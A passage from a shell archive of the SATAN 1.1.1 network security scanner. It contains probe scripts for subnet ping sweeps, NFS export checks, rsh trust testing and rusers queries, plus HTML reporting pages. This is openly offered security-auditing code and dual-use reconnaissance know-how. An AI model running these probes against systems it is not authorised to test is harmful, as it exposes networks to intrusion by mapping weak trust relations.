X# IP addresses that are alive, one per line.
X#
X
Xrequire 'config/paths.pl';
Xrequire 'perl/socket.pl'; # work around socket.ph problems
X
X$name = $ARGV[0];
Xif (! $name) { die "Usage: $0 network-address\n"; }
X
X#
X# hostname?
Xif ($name !~ /[0-9]+\.[0-9]+\.[0-9]+/) {
X ($name, $aliases, $type, $len, @ip) = gethostbyname($name);
X ($a,$b,$c,$d) = unpack('C4',$ip[0]);
X $name = "$a.$b.$c";
X }
X
X#
X# IP addr? If four octets, chop off the last one
Xif ($name =~ /[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+/) {
X ($name) = ($name =~ /^([0-9]+\.[0-9]+\.[0-9]+)\.[0-9]+/);
X }
X
X# 3 octets of an ip address:
Xif ($name =~ /^[0-9]+\.[0-9]+\.[0-9]+$/) {
X for $i (1..255) { $args .= "$name.$i "; }
X }
Xelse { die "Can't figure out what to scan ($name)\n"; }
X
X
X# spawn off fping, look at results
Xdie "Can't execute $FPING" unless open(FPING, "$FPING $args |");
X
Xwhile (<FPING>) {
X chop;
X ($target, $result) = /(\S+)\s+(.*)$/;
X if ($_ =~ /is unreachable/) { next; }
X if ($_ =~ /is alive/) {
X ($a,$b,$c,$d) = split(/\./, $target);
X @ip = ($a,$b,$c,$d);
X # Hack alert!! Some libcs dump when ahost has many addresses.
X if (fork() == 0) {
X ($name) = gethostbyaddr(pack("C4", @ip), &AF_INET);
X if ($name) { print "$name\n"; }
X else { print "$target\n"; }
X exit;
X }
X else { wait; }
X }
X }
X
Xclose(FPING);
END_OF_FILE
if test 1613 -ne `wc -c <'satan-1.1.1/bin/get_targets'`; then
echo shar: \"'satan-1.1.1/bin/get_targets'\" unpacked with wrong size!
fi
chmod +x 'satan-1.1.1/bin/get_targets'
# end of 'satan-1.1.1/bin/get_targets'
fi
if test -f 'satan-1.1.1/bin/nfs-chk.satan' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/bin/nfs-chk.satan'\"
else
echo shar: Extracting \"'satan-1.1.1/bin/nfs-chk.satan'\" $1771 characters$
sed "s/^X//" >'satan-1.1.1/bin/nfs-chk.satan' <<'END_OF_FILE'
X#!/usr/local/bin/perl5
X#
X# Report file systems that are exported via portmap or that can be mounted
X# by unpriviliged programs. World-mountable file systems are already taken
X# care of by showmount.satan.
X#
X# version 1, Mon Mar 20 18:48:11 1995, last mod by wietse
X#
X
X$running_under_satan = 1;
Xrequire 'config/satan.cf';
Xrequire 'config/paths.pl';
Xrequire 'perl/misc.pl';
Xrequire 'perl/hostname.pl';
Xrequire 'perl/getfqdn.pl';
Xrequire 'perllib/getopts.pl';
X
X$usage="Usage: $0 [-t timeout -u -v] target";
X$opt_u = $untrusted_host;
X&Getopts("t:uv") || die $usage;
X$timeout = $short_timeout;
X
X($#ARGV == 0) || die $usage;

X
X$target = $ARGV[0];

X$flags = "-v" if defined($opt_v);
X$timeout = $opt_t if defined($opt_t);
X$untrusted_host = $opt_u;
X
X$flags = "$flags -t $timeout" if defined($opt_t);
X

X$service = &basename($0, ".satan");

X$severity = "x";
X$status = "a";
X$service_output = "";
X
X$| = 1;
X
Xopen(NFS, "$NFS_CHK $flags $target |") || die "$0: cannot run nfs-chk";
Xwhile(<NFS>) {
X if (defined($opt_v)) {
X print;
X }
X if (/exports (\S+) via portmapper/) {
X $trusted = "ANY\@ANY";
X $trustee = "$1\@$target";
X $service_output = "NFS export via portmapper";
X $text = "exports $1 via portmapper";
X &satan_print();
X } elsif ($untrusted_host && /Mounted: (\S+) via mount daemon/) {
X $trusted = "ANY\@ANY";
X $trustee = "$1\@$target";
X $service_output = "unrestricted NFS export";
X $text = "exports $1 to everyone";
X &satan_print();
X } elsif (/exports (\S+) to unprivileged/) {
X $this_host = &getfqdn(&hostname());
X $trusted = "ANY\@$this_host";
X $trustee = "$1\@$target";
X $service_output = "NFS export to unprivileged programs";
X $text = "exports $1 to unprivileged programs";
X &satan_print();
X }
X # world-wide exports already taken care of in showmount.satan
X}
END_OF_FILE
if test 1771 -ne `wc -c <'satan-1.1.1/bin/nfs-chk.satan'`; then
echo shar: \"'satan-1.1.1/bin/nfs-chk.satan'\" unpacked with wrong size!
fi
chmod +x 'satan-1.1.1/bin/nfs-chk.satan'
# end of 'satan-1.1.1/bin/nfs-chk.satan'
fi
if test -f 'satan-1.1.1/bin/rsh.satan' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/bin/rsh.satan'\"
else
echo shar: Extracting \"'satan-1.1.1/bin/rsh.satan'\" $1579 characters$
sed "s/^X//" >'satan-1.1.1/bin/rsh.satan' <<'END_OF_FILE'
X#!/bin/sh
X#
X# Does host trust us? What is in hosts.equiv (probably a "+", if
X# this works...) Should run as "root"
X#
X# CHANGES TO BE DONE: do something with the output.
X#
X#
X# version 2, Sat Apr 8 21:02:49 1995, last mod by wietse
X#
X
X. config/paths.sh
X
Xuser=bin
Xtmp_file="./tmp_file.$$"
X
X# arg stuff:
Xwhile $TEST $# != 0
X do case "$1" in
X -u) user=$2 ; shift ;;
X *) target=$1
X esac
X shift
X done
X
Xif $TEST "X$target" = "X" ; then
X $ECHO Usage $0 [-u user] target
X exit 1
X fi
X
X# used in final output
X# target=$1
Xservice=`$BASENAME $0 | $SED 's/\..*$//'`
Xstatus="a"
Xservice_output=""
X
X
X# Check to see if we are who we should be -- bin or whatever:
Xwhoami=`$WHOAMI`
X
Xif $TEST "$whoami" = "root" ; then
X $RCMD $target $user "file /bin/sh" > $tmp_file 2> /dev/null
Xelse
X # $ECHO Must be run as root
X exit 2
X fi
X
Xif $GREP /bin/sh "$tmp_file" >/dev/null ; then
X # do we want to put the output into a data file?
X # $ECHO $target /etc/hosts.equiv file: `$CAT $tmp_file`
X trustee="USER@$target"
X service_output="remote shell access"
X if $TEST $user = "bin" ; then
X trusted="ANY@ANY"
X text="rshd trusts the world"
X
X # assume if you can get bin, a "+" in hosts.equiv, == root
X severity="rs"
X else
X trusted="$user@ANY"
X text="user $user trusts the world"
X severity="us"
X fi
Xelse
X severity=""
X trustee=""
X trusted=""
X service_output=""
X text="doesn't trust the world"
X fi
X
X$ECHO "$target|$service|$status|$severity|$trustee|$trusted|$service_output|$text"
X
X$RM -f $tmp_file
X
Xexit 0
X
X# finis
END_OF_FILE
if test 1579 -ne `wc -c <'satan-1.1.1/bin/rsh.satan'`; then
echo shar: \"'satan-1.1.1/bin/rsh.satan'\" unpacked with wrong size!
fi
chmod +x 'satan-1.1.1/bin/rsh.satan'
# end of 'satan-1.1.1/bin/rsh.satan'
fi
if test -f 'satan-1.1.1/bin/rusers.satan' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/bin/rusers.satan'\"
else
echo shar: Extracting \"'satan-1.1.1/bin/rusers.satan'\" $1783 characters$
sed "s/^X//" >'satan-1.1.1/bin/rusers.satan' <<'END_OF_FILE'
X#!/usr/local/bin/perl5
X#
X# version 1, Mon Mar 20 18:49:25 1995, last mod by wietse
X#
X
X# Query the target's rusers daemon and report which user logged in from

X# which host. Try to clean up unqualified host names or host names that

X# are truncated.

X
X$running_under_satan = 1;
X
Xrequire 'config/paths.pl';
Xrequire 'perl/fix_hostname.pl';
Xrequire 'perl/misc.pl';
Xrequire 'perllib/getopts.pl';
X
X#
X# Parse JCL.
X#

X$usage="Usage: rusers.satan target\n";
X&Getopts("v");

X
Xif ($#ARGV < 0) {
X print STDERR $usage;
X exit 1;
X}
X$target = $ARGV[0];
X$service = &basename($0, ".satan");
X

X$| = 1;
X
X#
X# Examine the output from the rusers client.
X#
Xopen (RUSERS, "$RUSERS -l $target 2>/dev/null|")
X || exit 1;
X
Xwhile (<RUSERS>) {
X ($user, $where, $month, $day, $time, $idle, $host) = split;
X
X # Deal with hostname stuff in case of remote logins.
X if (/$.*$/) {
X if ($idle && !$host) {
X $host = $idle;
X }
X # Get rid of X display numbers.
X $host =~ s/:.*//;
X $host =~ s/[()]//g;
X
X # Verify hostname if anything interesting was left.
X if ($host ne "" && $host ne "localhost") {
X # Canonicalize the host name.

X if ($fqdn = &fix_hostname($host, $target)) {
X $host = $fqdn;
X $status = "a";

X $severity = "l";

X $trustee = "$user\@$target";

X $trusted = "root\@$host";
X $service_output = "$user";
X $text = "login $user from $host";
X &satan_print();

X } else {
X $status = "u";

X $severity = "l";

X $trustee = "$user\@$target";

X $trusted = "root\@$host";
X $service_output = "$user";
X $text = "login $user from $host, unable to verify hostname";
X &satan_print();
X }
X }
X }
X # Log this user, whether or not remote.
X $status = "a";
X $severity = "l";
X $text = "login $user";
X $service_output = "$user";
X $trusted = $trustee = "";
X &satan_print();
X}
END_OF_FILE
if test 1783 -ne `wc -c <'satan-1.1.1/bin/rusers.satan'`; then
echo shar: \"'satan-1.1.1/bin/rusers.satan'\" unpacked with wrong size!
fi
chmod +x 'satan-1.1.1/bin/rusers.satan'
# end of 'satan-1.1.1/bin/rusers.satan'
fi
if test -f 'satan-1.1.1/html/data/satan_data_form.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/data/satan_data_form.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/html/data/satan_data_form.pl'\" $1603 characters$
sed "s/^X//" >'satan-1.1.1/html/data/satan_data_form.pl' <<'END_OF_FILE'
X#
X# Select SATAN data base
X#
X$_satan_dir = "";
X@_results = `ls results`;
Xfor (@_results) { chop; }
X
Xprint CLIENT <<EOF;
X<HTML>
X<HEAD>
X<title> SATAN Data Management </title>
X<LINK REV="made" HREF="mailto:satan\@fish.com">
X</HEAD>
X<BODY>
X<H1><IMG SRC=$HTML_ROOT/images/satan.gif> SATAN Data Management </H1>
X<hr>
X
X<ul>
X<p><li><a href="#open">Open or create SATAN database</a>
X<p><li><a href="#merge">Merge existing SATAN database</a>
X</ul>
X<hr>
X
X<FORM METHOD=POST ACTION="satan_open_action.pl">
X
X<a name="open-or-create"><h3>Open existing or create new SATAN data base</h3>
X
X<h3>
X<INPUT TYPE="reset" VALUE=" Reset ">
X<INPUT SIZE="28" NAME="_satan_dir" Value="$satan_data">
X<INPUT TYPE="submit" VALUE=" Open or create ">
X</h3>
X
X</FORM>
X
XEOF
X
Xif (@_results) {
X print CLIENT <<EOF;
X <h3>Existing data bases...</h3>

XEOF
X}
X
Xprint CLIENT <<EOF;

X<ul>
XEOF
Xfor (@_results) {
X if (-d "results/$_") {
X print CLIENT <<EOF;
X <li> <a href="satan_open_action.pl,$_,">$_</a>
XEOF
X }

X}
X
Xprint CLIENT <<EOF;
X</ul>
X

X<hr>
X
X<FORM METHOD=POST ACTION="satan_merge_action.pl">
X
X<a name="merge"><h3>Merge with existing SATAN data base</h3>
X
X<h3>
X<INPUT TYPE="reset" VALUE=" Reset ">
X<INPUT SIZE="28" NAME="_satan_dir" Value="">
X<INPUT TYPE="submit" VALUE=" Merge ">
X</h3>
X
X</FORM>
X
XEOF
X
Xif (@_results) {
X print CLIENT <<EOF;
X <h3>Existing data bases...</h3>

XEOF
X}
X
Xprint CLIENT <<EOF;

X<ul>
XEOF
X
Xfor (@_results) {
X if (-d "results/$_") {
X print CLIENT <<EOF;
X <li> <a href="satan_merge_action.pl,$_,">$_</a>
XEOF
X }

X}
X
Xprint CLIENT <<EOF;
X</ul>

X<hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a>

X</BODY>
X</HTML>
XEOF
END_OF_FILE

if test 1603 -ne `wc -c <'satan-1.1.1/html/data/satan_data_form.pl'`; then
echo shar: \"'satan-1.1.1/html/data/satan_data_form.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/data/satan_data_form.pl'
fi
if test -f 'satan-1.1.1/html/data/satan_merge_action.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/data/satan_merge_action.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/html/data/satan_merge_action.pl'\" $1269 characters$
sed "s/^X//" >'satan-1.1.1/html/data/satan_merge_action.pl' <<'END_OF_FILE'
X#
X# Open a data base and keep the user informed.
X#
X($_directory) = split(/,/, $html_script_args);
X
X#
X# Make sure they specified a directory at all.
X#
X$_directory = $_satan_dir if $_directory eq "";
X
Xif ($_directory eq "") {
X print CLIENT <<EOF;
X<HTML>
X<HEAD>

X<TITLE>Error - Missing input </TITLE>

X<LINK REV="made" HREF="mailto:satan\@fish.com">
X</HEAD>
X<BODY>

X<H1><IMG SRC=$HTML_ROOT/images/satan.gif> Error - Missing input </H1>
X<hr>

XNo data base name was specified.

X</BODY>
X</HTML>
XEOF

X die "\n";
X}
X
X#

X# Create data base when it does not exist
X#
X$satan_data = $_directory;
X&find_satan_data();
X
X#
X# Read the data base, after resetting the in-core data structures.
X#
Xprint CLIENT <<EOF;
X<HTML>
X<HEAD>
X<TITLE>SATAN Data Management</TITLE>
X<LINK REV="made" HREF="mailto:satan\@fish.com">
X</HEAD>
X<BODY>
X<H1><IMG SRC=$HTML_ROOT/images/satan.gif> SATAN Data Management</H1>
X<HR>
XEOF
X
Xif (-s "$facts_file") {
X print CLIENT <<EOF;
X<strong>merging data from <i> $_directory. </i> This may take some time. <p>
XEOF
X}
X
X&merge_satan_data();
X
Xprint CLIENT <<EOF;
X<strong>Data base selection completed successfully.</strong>

X<hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a>
X| <a href=../reporting/analysis.pl>Continue with report and analysis</a>

X</BODY>
X</HTML>
XEOF
END_OF_FILE

if test 1269 -ne `wc -c <'satan-1.1.1/html/data/satan_merge_action.pl'`; then
echo shar: \"'satan-1.1.1/html/data/satan_merge_action.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/data/satan_merge_action.pl'
fi
if test -f 'satan-1.1.1/html/data/satan_open_action.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/data/satan_open_action.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/html/data/satan_open_action.pl'\" $1268 characters$
sed "s/^X//" >'satan-1.1.1/html/data/satan_open_action.pl' <<'END_OF_FILE'
X#
X# Open a data base and keep the user informed.
X#
X($_directory) = split(/,/, $html_script_args);
X
X#
X# Make sure they specified a directory at all.
X#
X$_directory = $_satan_dir if $_directory eq "";
X
Xif ($_directory eq "") {
X print CLIENT <<EOF;
X<HTML>
X<HEAD>

X<TITLE>Error - Missing input </TITLE>

X<LINK REV="made" HREF="mailto:satan\@fish.com">
X</HEAD>
X<BODY>

X<H1><IMG SRC=$HTML_ROOT/images/satan.gif> Error - Missing input </H1>
X<hr>

XNo data base name was specified.

X</BODY>
X</HTML>
XEOF

X die "\n";
X}
X
X#

X# Create data base when it does not exist
X#
X$satan_data = $_directory;
X&init_satan_data();
X
X#
X# Read the data base, after resetting the in-core data structures.
X#
Xprint CLIENT <<EOF;
X<HTML>
X<HEAD>
X<TITLE>SATAN Data Management</TITLE>
X<LINK REV="made" HREF="mailto:satan\@fish.com">
X</HEAD>
X<BODY>
X<H1><IMG SRC=$HTML_ROOT/images/satan.gif> SATAN Data Management</H1>
X<HR>
XEOF
X
Xif (-s "$facts_file") {
X print CLIENT <<EOF;
X<strong>Loading data from <i> $_directory. </i> This may take some time. <p>
XEOF
X}
X
X&read_satan_data();
X
Xprint CLIENT <<EOF;
X<strong>Data base selection completed successfully.</strong>

X<hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a>
X| <a href=../reporting/analysis.pl>Continue with report and analysis</a>

X</BODY>
X</HTML>
XEOF
END_OF_FILE

if test 1268 -ne `wc -c <'satan-1.1.1/html/data/satan_open_action.pl'`; then
echo shar: \"'satan-1.1.1/html/data/satan_open_action.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/data/satan_open_action.pl'
fi
if test -f 'satan-1.1.1/html/docs/authors.html' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/docs/authors.html'\"
else
echo shar: Extracting \"'satan-1.1.1/html/docs/authors.html'\" $1581 characters$
sed "s/^X//" >'satan-1.1.1/html/docs/authors.html' <<'END_OF_FILE'
X<HTML>
X<HEAD>
X<title>Author, authors!</title>

X<LINK REV="made" HREF="mailto:sa...@fish.com">
X</HEAD>
X<BODY>

X<h2><IMG SRC="../images/satan-almost-full.gif" ALT="[SATAN IMAGE]"> Authors</H2>
X<HR>
X<strong>Dan Farmer</strong>
X<P>
X<A HREF="http://www.fish.com/fish.com/dan.html">dan</A>
Xis a computer spy and master procrastinator (just ask wietse!) that hacks
Xmostly Unix stuff in awk, perl, shell, and C. He lives in San
XFrancisco, California, USA, is a professional slacker,
Xand is lucky enough to be able to live in an electronic age that
Xpermits him to work with wietse.
X<P>
X<strong>Wietse Venema</strong>
X<P>
X<A HREF="http://www.win.tue.nl/win/math/bs/wietse">
XWietse</A> is a Unix guru who lives in <A
XHREF="http://www.ic.gov/94fact/country/171.html">the Netherlands</A>
Xand works for the <A HREF="http://www.tue.nl"> Eindhoven University of
XTechnology</A>. He is having several professional lives, and in his
Xspare time likes to write amazing <a
Xhref="ftp://ftp.win.tue.nl/pub/security/index.html">tools and
Xpapers.</a> </DL>
X<p>
X<HR>
XE-mail to both authors can be sent to
X<A HREF="mailto:sa...@fish.com">sa...@fish.com</A> (or click
Xon the e-mail address.) We'll try to answer it, but please be aware
Xthat we only work on SATAN in our (very) part time. You might also try
Xposting to <I>comp.security.unix</I> for answers.
XFailing either of these, you can send mail directly to dan:
X<p>
X<ADDRESS><A HREF="mailto:z...@fish.com">z...@fish.com</A></ADDRESS>
X<p>
Xor Wietse:
X<p>
X<ADDRESS><A HREF="mailto:wie...@wzv.win.tue.nl">wie...@wzv.win.tue.nl</A></ADDRESS>

X</BODY>
X</HTML>
END_OF_FILE

if test 1581 -ne `wc -c <'satan-1.1.1/html/docs/authors.html'`; then
echo shar: \"'satan-1.1.1/html/docs/authors.html'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/docs/authors.html'
fi
if test -f 'satan-1.1.1/html/docs/copyright.html' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/docs/copyright.html'\"
else
echo shar: Extracting \"'satan-1.1.1/html/docs/copyright.html'\" $1313 characters$
sed "s/^X//" >'satan-1.1.1/html/docs/copyright.html' <<'END_OF_FILE'
X<HTML>
X<HEAD>
X<title>Copyright</title>

X<LINK REV="made" HREF="mailto:sa...@fish.com">
X</HEAD>
X<BODY>

X<H2>Copyright</H2>
X<HR>
X<P>
XCopyright 1995 by Dan Farmer and Wietse Venema. All rights reserved.
XSome individual files may be covered by other copyrights (this will
Xbe noted in the file itself.)
X<P>
XRedistribution and use in source and binary forms are permitted
Xprovided that this entire copyright notice is duplicated in all such
Xcopies. No charge, other than an "at-cost" distribution fee, may be
Xcharged for copies, derivations, or distributions of this material
Xwithout the express written consent of the copyright holders.
X<P>
XTHIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR IMPLIED
XWARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF
XMERCHANTIBILITY AND FITNESS FOR ANY PARTICULAR PURPOSE.
X<P>
XIN NO EVENT SHALL THE AUTHORS OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
XINDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
X(INCLUDING, BUT NOT LIMITED TO, LOSS OF USE, DATA, OR PROFITS OR
XBUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
XWHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
XOTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
XADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
X

X</BODY>
X</HTML>
END_OF_FILE

if test 1313 -ne `wc -c <'satan-1.1.1/html/docs/copyright.html'`; then
echo shar: \"'satan-1.1.1/html/docs/copyright.html'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/docs/copyright.html'
fi
if test -f 'satan-1.1.1/html/reporting/satan_info_clients.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/reporting/satan_info_clients.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/html/reporting/satan_info_clients.pl'\" $1207 characters$
sed "s/^X//" >'satan-1.1.1/html/reporting/satan_info_clients.pl' <<'END_OF_FILE'
X#
X# List hosts that use a specific service.
X#
X($_SERVICE, $_sort_order) = split(/,/, $html_script_args);
X($_service = $_SERVICE) =~ tr/?!/ \//;
X
Xprint CLIENT <<EOF;
X<HTML>
X<HEAD>
X<title> Host Table - $_service Clients</title>
X<LINK REV="made" HREF="mailto:satan\@fish.com">
X</HEAD>
X<BODY>
X<H1><IMG SRC=$HTML_ROOT/images/satan.gif> Host Table - $_service Clients</H1>
X<hr>
X
X<h3>
X$client_severities{$_service} Vulnerable/$client_counts{$_service} total.
XVulnerability counts in parentheses.
X</h3>
X
X<H4> Sort hosts by:
X<a href="satan_info_clients.pl,$_SERVICE,name,">name</a> |
X<a href="satan_info_clients.pl,$_SERVICE,domain,">domain</a> |
X<a href="satan_info_clients.pl,$_SERVICE,type,">system type</a> |
X<a href="satan_info_clients.pl,$_SERVICE,subnet,">subnet</a> |
X<a href="satan_info_clients.pl,$_SERVICE,severity,">problem count</a> |
X<a href="satan_info_clients.pl,$_SERVICE,severity_type,">problem type</a>
X</H4>
X
X</FORM>
XEOF
X
X@_hosts = keys %{$clients{$_service}};

Xdo "$html_root/reporting/sort_hosts.pl";
Xprint CLIENT $@ if $@;

X
Xprint CLIENT <<EOF;
X<hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a> |
X<a href=analysis.pl> Back to SATAN Reporting and Analysis </a>
X</BODY>
X</HTML>
XEOF
END_OF_FILE

if test 1207 -ne `wc -c <'satan-1.1.1/html/reporting/satan_info_clients.pl'`; then
echo shar: \"'satan-1.1.1/html/reporting/satan_info_clients.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/reporting/satan_info_clients.pl'
fi
if test -f 'satan-1.1.1/html/reporting/satan_info_servers.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/reporting/satan_info_servers.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/html/reporting/satan_info_servers.pl'\" $1204 characters$
sed "s/^X//" >'satan-1.1.1/html/reporting/satan_info_servers.pl' <<'END_OF_FILE'
X#
X# List hosts that provide a specific service.
X#
X($_SERVICE, $_sort_order) = split(/,/, $html_script_args);
X($_service = $_SERVICE) =~ tr/?!/ \//;
X
Xprint CLIENT <<EOF;
X<HTML>
X<HEAD>
X<title> Host Table - $_service Servers </title>
X<LINK REV="made" HREF="mailto:satan\@fish.com">
X</HEAD>
X<BODY>
X<H1><IMG SRC=$HTML_ROOT/images/satan.gif> Host Table - $_service Servers </H1>
X<hr>
X
X<h3>
X$server_severities{$_service} Vulnerable/$server_counts{$_service} total.
XVulnerability counts in parentheses.
X</h3>
X
X<H4> Sort hosts by:
X<a href="satan_info_servers.pl,$_SERVICE,name,">name</a> |
X<a href="satan_info_servers.pl,$_SERVICE,domain,">domain</a> |
X<a href="satan_info_servers.pl,$_SERVICE,type,">system type</a> |
X<a href="satan_info_servers.pl,$_SERVICE,subnet,">subnet</a> |
X<a href="satan_info_servers.pl,$_SERVICE,severity,">problem count</a> |
X<a href="satan_info_servers.pl,$_SERVICE,severity_type,">problem type</a>
X</H4>
XEOF
X
X@_hosts = keys %{$servers{$_service}};

Xdo "$html_root/reporting/sort_hosts.pl";
Xprint CLIENT $@ if $@;

X
Xprint CLIENT <<EOF;
X<hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a> |
X<a href=analysis.pl> Back to SATAN Reporting and Analysis </a>
X</BODY>
X</HTML>
XEOF
END_OF_FILE

if test 1204 -ne `wc -c <'satan-1.1.1/html/reporting/satan_info_servers.pl'`; then
echo shar: \"'satan-1.1.1/html/reporting/satan_info_servers.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/reporting/satan_info_servers.pl'
fi
if test -f 'satan-1.1.1/html/reporting/satan_info_subnet.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/reporting/satan_info_subnet.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/html/reporting/satan_info_subnet.pl'\" $1226 characters$
sed "s/^X//" >'satan-1.1.1/html/reporting/satan_info_subnet.pl' <<'END_OF_FILE'
X#
X# Report subnets
X#
X
X# generate the tables for looking subnets/hosts in:
X&make_subnet_info();
X$_subnets = keys %all_subnets;

X
Xsub sort_ip {
X local($aip,$bip);
X for $ip (split(/\./,$a)) { $aip = $aip * 256 + $ip; }
X for $ip (split(/\./,$b)) { $bip = $bip * 256 + $ip; }
X return $aip <=> $bip;

X}
X
Xprint CLIENT <<EOF;

X<HTML>
X<HEAD>
X<title> Host Tables - By Subnet </title>
X<LINK REV="made" HREF="mailto:satan\@fish.com">
X</HEAD>
X<BODY>
X<H1><IMG SRC=$HTML_ROOT/images/satan.gif> Host Tables - By Subnet </H1>
X<hr>
X<h3>$_subnets Subnets. Number of hosts per subnet (vulnerable/total). </h3>
X<strong>Subnets with a red dot next to them have a vulnerable host contained within.</strong>
X<ul>
XEOF
X
X# until the subnet is all looked at...
Xfor $_net (sort sort_ip keys %all_subnets) {
X $dot = $subnet_severities{$_net} ? "red" : "black";
X print CLIENT <<EOF;
X <dt><IMG SRC=$HTML_ROOT/dots/$dot\dot.gif ALT="$dot">
X <a href="satan_results_subnet.pl,$_net,"> $_net </a>
X ($subnet_severities{$_net}/$subnet_count{$_net})

XEOF
X }
X
Xprint CLIENT <<EOF;
X</ul>

X<hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a> |
X<a href=analysis.pl> Back to SATAN Reporting and Analysis </a>
X</BODY>
X</HTML>
XEOF
END_OF_FILE

if test 1226 -ne `wc -c <'satan-1.1.1/html/reporting/satan_info_subnet.pl'`; then
echo shar: \"'satan-1.1.1/html/reporting/satan_info_subnet.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/reporting/satan_info_subnet.pl'
fi
if test -f 'satan-1.1.1/html/reporting/satan_results_trusted.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/reporting/satan_results_trusted.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/html/reporting/satan_results_trusted.pl'\" $1215 characters$
sed "s/^X//" >'satan-1.1.1/html/reporting/satan_results_trusted.pl' <<'END_OF_FILE'
X#
X# List hosts that this host trusts
X#
X($_TRUSTEE, $_sort_order) = split(/,/, $html_script_args);
X($_trustee = $_TRUSTEE) =~ tr/?!/ \//;
X
Xprint CLIENT <<EOF;
X<HTML>
X<HEAD>
X<title> Trust - $_trustee</title>
X<LINK REV="made" HREF="mailto:satan\@fish.com">
X</HEAD>
X<BODY>
X<H1><IMG SRC=$HTML_ROOT/images/satan.gif> Trust - $_trustee</h1>
X<hr>
X
X<h3>Hosts trusted by $_trustee (vulnerability counts). </h3>
X
X<H4> Sort hosts by:
X<a href="satan_results_trusted.pl,$_TRUSTEE,name,">name</a> |
X<a href="satan_results_trusted.pl,$_TRUSTEE,domain,">domain</a> |
X<a href="satan_results_trusted.pl,$_TRUSTEE,type,">system type</a> |
X<a href="satan_results_trusted.pl,$_TRUSTEE,subnet,">subnet</a> |
X<a href="satan_results_trusted.pl,$_TRUSTEE,severity,">problem count</a> |
X<a href="satan_results_trusted.pl,$_TRUSTEE,severity_type,">problem type</a> |
X<a href="satan_results_trusted.pl,$_TRUSTEE,trusted_type,">trust type</a>
X</H4>
XEOF
X
X@_hosts = split(/\s+/, $total_trusted_names{$_trustee});

Xdo "$html_root/reporting/sort_hosts.pl";
Xprint CLIENT $@ if $@;

X
Xprint CLIENT <<EOF;
X<hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a> |
X<a href=analysis.pl> Back to SATAN Reporting and Analysis </a>
X</BODY>
X</HTML>
XEOF
END_OF_FILE

if test 1215 -ne `wc -c <'satan-1.1.1/html/reporting/satan_results_trusted.pl'`; then
echo shar: \"'satan-1.1.1/html/reporting/satan_results_trusted.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/reporting/satan_results_trusted.pl'
fi
if test -f 'satan-1.1.1/html/reporting/satan_results_trusting.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/reporting/satan_results_trusting.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/html/reporting/satan_results_trusting.pl'\" $1237 characters$
sed "s/^X//" >'satan-1.1.1/html/reporting/satan_results_trusting.pl' <<'END_OF_FILE'
X#
X# List hosts that trust this host by trust relation
X#
X($_TRUSTED, $_sort_order) = split(/,/, $html_script_args);
X($_trusted = $_TRUSTED) =~ tr/?!/ \//;
X
Xprint CLIENT <<EOF;
X<HTML>
X<HEAD>
X<title> Trust - $_trusted</title>
X<LINK REV="made" HREF="mailto:satan\@fish.com">
X</HEAD>
X<BODY>
X<H1><IMG SRC=$HTML_ROOT/images/satan.gif> Trust - $_trusted</h1>
X<hr>
X
X<h3>Hosts trusting $_trusted (vulnerability counts). </h3>
X
X<H4> Sort hosts by:
X<a href="satan_results_trusting.pl,$_TRUSTED,name,">name</a> |
X<a href="satan_results_trusting.pl,$_TRUSTED,domain,">domain</a> |
X<a href="satan_results_trusting.pl,$_TRUSTED,type,">system type</a> |
X<a href="satan_results_trusting.pl,$_TRUSTED,subnet,">subnet</a> |
X<a href="satan_results_trusting.pl,$_TRUSTED,severity,">problem count</a> |
